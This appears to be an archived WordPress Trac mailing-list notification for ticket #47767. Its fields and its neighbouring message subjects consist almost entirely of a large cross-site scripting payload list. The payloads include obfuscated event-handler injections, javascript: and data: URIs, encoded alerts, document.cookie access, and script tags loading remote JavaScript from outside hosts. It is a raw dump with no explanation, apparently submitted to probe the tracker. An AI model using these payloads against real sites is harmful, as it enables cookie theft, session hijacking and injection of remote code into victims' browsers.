/***/ <iframe srcdoc='<body |
onload=prompt(1)>'> <a |
href="javascript:void(0)" |
onmouseover=
javascript:alert(1)
>X</a>|
<script ~~~>alert(0%0)</script ~~~> |
<style/onload=<!-- >
alert
(1)>|
<///style///><span %2F |
onmousemove='alert(1)'>SPAN |
<img/src='http://i.imgur.com/P8mL8.jpg' |
onmouseover= prompt(1) |
"><svg><style>{-o-link- |
source:'<body/onload=confirm(1)>' |
<blink/
|
onmouseover=prompt(1)>OnMouseOver |
{Firefox & Opera} <marquee |
onstart='javascript:alert(1)'>^__^ |
<div/style="width:expression(confirm(1))">X</div>|
{IE7} <iframe/%00/ |
src=javaSCRIPT:alert(1) |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//|
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)|
/*iframe/src*/> //|\\ <script //|\\ |
src='https://dl.dropbox.com/u/13018058/js.js'> |
//|\\ </script //|\\ |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>|
<a/href="javascript:
|
javascript:prompt(1)"><input type="X"> |
</plaintext\></|\><plaintext/onmouseover=prompt(1)|
</svg>''<svg><script |
'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1)|
{Opera} <a |
href="javascript:\u0061le%72t(1)"><button>|
<div |
onmouseover='alert(1)'>DIV</div> |
<iframe |
style="xg-p:absolute;top:0;left:0;width:100%;height:100%"|
onmouseover="prompt(1)"> <a |
href="jAvAsCrIpT:alert(1)">X</a>|
<embed |
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">|
<object |
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">|
<var onmouseover="prompt(1)">On Mouse |
Over</var> <a |
href=javascript:alert(document.cookie)>Click|
Here</a> <img src="/" =_=" |
title="onerror='prompt(1)'"> |
<%<!--'%><script>alert(1);</script --> |
<script src="data:text/javascript |
alert(1)"></script> <iframe/src \/\/onload = |
prompt(1) <iframe/onreadystatechange=alert(1) |
<svg/onload=alert(1) <input |
value=<><iframe/src=javascript:confirm(1) |
<input type="text" value=`` |
<div/onmouseover='alert(1)'>X</div> |
http://www.<script>alert(1)</script .com |
<iframe |
src=j
a
v
a
s
c
r
i
p
t
:a
l
e
r
t
28
1
%29></iframe>|
<svg><script ?>alert(1) <iframe |
src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>|
<img src=`xx:xx`onerror=alert(1)> <meta http- |
equiv="refresh" |
content="0;javascript:alert(1)"/> |
<math><a |
xlink:href="//jsfiddle.net/t846h/">click |
<embed |
code="http://businessinfo.co.uk/labs/xss/xss.swf"|
allowscriptaccess=always> <svg |
contentScriptType=text/vbs><script>MsgBox+1 |
<a href="data:text/html;base64_ |
<svg/onload=\u0061le%72t(1)>">X</a |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')|
worksinIE> <script>~'\u0061' ; |
\u0074\u0068\u0072\u006F\u0077 ~ |
\u0074\u0068\u0069\u0073. |
\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script|
U+ |
<script/src="data:text%2Fj\u0061v\u0061script|
\u0061lert('\u0061')"></script a=\u0061 & |
/=%2F |
<script/src=data:text/j\u0061v\u0061script|
\u0061%6C%65%72%74(/XSS/)></script <object |
data=javascript:\u0061le%72t(1)>|
<script>+-+-1-+-+alert(1)</script> |
<body/onload=<!-->
alert(1)> <script |
itworksinallbrowsers>/*<script* |
*/alert(1)</script <img src |
?itworksonchrome?\/onerror = alert(1) |
<svg><script>//
confirm(1);</script |
</svg> <svg><script onlypossibleinopera:-)> |
alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa |
aaaaaaaa aaaaaaaaa aaaaaaaaaa |
href=javascript:alert(1)>ClickMe |
<script x> alert(1) </script 1=2 |
<div/onmouseover='alert(1)'> style="x:"> |
<--`<img/src=` onerror=alert(1)> --!> |
<script/src=data:text/javascript|
alert(1)></script>|
<div |
style="xg-p:absolute;top:0;left:0;width:100%;height:100%"|
onmouseover="prompt(1)" |
onclick="alert(1)">x</button> "><img src=x |
onerror=window.open('https://www.google.com/');>|
<form><button |
formaction=javascript:alert(1)>CLICKME |
<math><a |
xlink:href="//jsfiddle.net/t846h/">click |
<object data=data:text/html;base64 |
PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> |
<iframe src="data:text/html |
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>|
<a href="data:text/html;blabla |
<script src="http://sternefamily.net/foo.js"></script>​">Click|
Me</a> |
-------------------------------------------------+-------------------------
Changes (by bugbounty00):
* Attachment "test (2).jpg" added.
"><img src=Xss onerror=alert(1)>
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47767>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
- Previous message (by thread): [wp-trac] [WordPress Trac] #47767: <iframe %00 src="	 javascript:prompt(1)	 "%00> <svg><style>{font-family: '<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT: confirm( 1) " <sVg><scRipt %00>alert( 1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript: confirm(1)" <img src=`%00`
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	 ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; 	 base64	 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ " > <h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg o n load=alert(1)>"> <meta content="
 1 
 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data: ,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0; url=javascript:confirm(1)"> <iframe src=javascript: alert( document. location) > <form><a href="javascript:\u0061lert( 1) ">X </script><img/*%00/src="worksinchrome: prompt( 1) "/%00*/onerror='eval(src)'> <img/	  src=`~` onerror=prompt(1)> <form><iframe 	  src="javascript: alert(1)" 	 ; > <a href="data:application/x-x509-user-cert; 
 base64
 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	  >X</a http://www.google<script .com>alert(document.location)</script <a  href= [ � ] "� onmouseover=prompt( 1) / / ">XYZ</a <img/src=@  onerror = prompt('1 ') <style/onload=prompt( 'X S S ') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style   ><script   :-(>/**/alert(document.location)/**/</script   :-( � </form><input type= "date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074( 1) '> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='< body onload=prompt( 1) > '> <a href="javascript:void(0)" onmouseover=
 javascript:alert(1)
 >X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=< !--	 > alert ( 1) > <///style///><span %2F onmousemove='alert( 1) '>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	 prompt(1) " > <svg><style>{-o-link-source: '<body/onload=confirm(1)>' <blink/ onmouseover=pro mpt (1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert( 1) '>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT: alert(1) //<form/action=javascript: alert( document. cookie) ><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src: '<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert( 1) {Opera} <a href="javascript: \u0061l e%72t( 1) "><button> <div onmouseover='alert( 1) '>DIV</div> <iframe style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT: alert( 1) ">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript: alert( document. cookie) >Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1); </script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
 	 a
 	 	 v
 	 	 	 a
 	 	 	 	 s
 	 	 	 	 	 c
 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 i
 	 	 	 	 	 	 	 	 p
 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 : a
 	 	 	 	 	 	 	 	 	 	 	 l
 	 	 	 	 	 	 	 	 	 	 	 	 e
 	 	 	 	 	 	 	 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 28
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 1
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 %29></iframe> <svg><script ?>alert(1) <iframe src=j	 a	 v	 a	 s	 c	 r	 i	 p	 t	 :a	 l	 e	 r	 t	 %28	 1	 %29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0; javascript: alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html; base64_,<svg/onload=\u0061l e%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data: text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data: text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript: \u0061l e%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=< !--> 
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
 confirm(1); </script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript: alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,a l e r t (1)></script> <div style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/'); > <form><button formaction=javascript: alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html; base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html; blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- Next message (by thread): [wp-trac] [WordPress Trac] #47767: <iframe %00 src="	 javascript:prompt(1)	 "%00> <svg><style>{font-family: '<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT: confirm( 1) " <sVg><scRipt %00>alert( 1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript: confirm(1)" <img src=`%00`
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	 ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; 	 base64	 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ " > <h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg o n load=alert(1)>"> <meta content="
 1 
 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data: ,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0; url=javascript:confirm(1)"> <iframe src=javascript: alert( document. location) > <form><a href="javascript:\u0061lert( 1) ">X </script><img/*%00/src="worksinchrome: prompt( 1) "/%00*/onerror='eval(src)'> <img/	  src=`~` onerror=prompt(1)> <form><iframe 	  src="javascript: alert(1)" 	 ; > <a href="data:application/x-x509-user-cert; 
 base64
 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	  >X</a http://www.google<script .com>alert(document.location)</script <a  href= [ � ] "� onmouseover=prompt( 1) / / ">XYZ</a <img/src=@  onerror = prompt('1 ') <style/onload=prompt( 'X S S ') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style   ><script   :-(>/**/alert(document.location)/**/</script   :-( � </form><input type= "date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074( 1) '> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='< body onload=prompt( 1) > '> <a href="javascript:void(0)" onmouseover=
 javascript:alert(1)
 >X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=< !--	 > alert ( 1) > <///style///><span %2F onmousemove='alert( 1) '>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	 prompt(1) " > <svg><style>{-o-link-source: '<body/onload=confirm(1)>' <blink/ onmouseover=pro mpt (1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert( 1) '>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT: alert(1) //<form/action=javascript: alert( document. cookie) ><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src: '<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert( 1) {Opera} <a href="javascript: \u0061l e%72t( 1) "><button> <div onmouseover='alert( 1) '>DIV</div> <iframe style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT: alert( 1) ">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript: alert( document. cookie) >Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1); </script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
 	 a
 	 	 v
 	 	 	 a
 	 	 	 	 s
 	 	 	 	 	 c
 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 i
 	 	 	 	 	 	 	 	 p
 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 : a
 	 	 	 	 	 	 	 	 	 	 	 l
 	 	 	 	 	 	 	 	 	 	 	 	 e
 	 	 	 	 	 	 	 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 28
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 1
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 %29></iframe> <svg><script ?>alert(1) <iframe src=j	 a	 v	 a	 s	 c	 r	 i	 p	 t	 :a	 l	 e	 r	 t	 %28	 1	 %29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0; javascript: alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html; base64_,<svg/onload=\u0061l e%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data: text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data: text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript: \u0061l e%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=< !--> 
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
 confirm(1); </script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript: alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,a l e r t (1)></script> <div style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/'); > <form><button formaction=javascript: alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html; base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html; blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- Messages sorted by:
[ date ]
[ thread ]
[ subject ]
[ author ]
More information about the wp-trac
mailing list